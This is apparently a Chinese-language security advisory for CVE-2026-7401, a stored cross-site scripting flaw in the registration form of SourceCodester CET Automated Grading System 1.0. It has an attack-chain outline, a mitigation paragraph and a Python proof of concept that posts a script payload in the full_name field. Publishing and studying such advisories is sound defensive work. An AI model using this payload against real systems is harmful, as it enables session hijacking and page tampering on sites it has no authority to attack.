CVE-2026-7401 CVSS 4.3 中危

CVE-2026-7401 SourceCodester评分系统存储型XSS漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7401

漏洞类型

跨站脚本 (XSS)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester CET Automated Grading System with AI Predictive Analytics

漏洞概述

SourceCodester CET Automated Grading System 1.0存在跨站脚本漏洞。该漏洞位于注册组件的`/index.php?action=register`接口中，由于未对`student_id`、`full_name`等参数进行有效过滤，攻击者无需认证即可注入恶意脚本。该漏洞已公开，可能导致管理员访问后台时触发脚本，破坏页面完整性。

技术细节

该漏洞属于存储型跨站脚本（Stored XSS）。漏洞发生在SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0的注册模块。具体而言，应用程序在`/index.php?action=register`处理注册请求时，未能对`student_id`、`full_name`、`section`和`username`这几个关键参数进行适当的输入清理和上下文感知的输出编码。攻击者可以利用这一缺陷，构造含有JavaScript代码的Payload并通过HTTP POST请求提交。由于系统缺乏验证，这些恶意数据会被持久化存储在后端数据库中。当管理员或授权用户访问受污染的管理仪表板或相关页面时，嵌入的恶意脚本将在其浏览器环境中自动解析并执行。攻击者无需登录即可发起攻击（PR:N），但需要诱导管理员查看页面（UI:R），从而执行窃取会话令牌、篡改页面内容等操作，对系统完整性构成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统为SourceCodester CET Automated Grading System 1.0，并确认注册入口点。

STEP 2

2. 漏洞利用

攻击者向`/index.php?action=register`发送POST请求，在`full_name`等字段中注入恶意的JavaScript代码。

STEP 3

3. 恶意存储

由于后端未过滤输入，恶意脚本被存储在数据库中。

STEP 4

4. 触发执行

当管理员或其他用户登录后台并查看包含该数据的页面时，恶意脚本在浏览器中执行。

STEP 5

5. 攻击后果

脚本执行可能导致劫持管理员会话、篡改网页内容或进行重定向攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_xss(target_url):
    """
    PoC for CVE-2026-7401
    Exploits Stored XSS in Registration component
    """
    register_url = f"{target_url}/index.php?action=register"
    
    # Malicious payload to be stored and executed later
    xss_payload = "<script>alert('CVE-2026-7401_XSS');</script>"
    
    # Vulnerable parameters
    payload_data = {
        "student_id": "12345",
        "full_name": xss_payload,
        "section": "Science",
        "username": "attacker",
        "password": "password123"
    }
    
    try:
        response = requests.post(register_url, data=payload_data)
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[*] Check the Admin Dashboard to verify the XSS trigger.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://target-ip" # Replace with actual target IP
    exploit_xss(target)

影响范围

SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0

防御指南

临时缓解措施

建议立即在服务器端对`student_id`、`full_name`、`section`及`username`参数进行过滤和转义，暂时禁用受影响的注册功能，直到应用官方补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表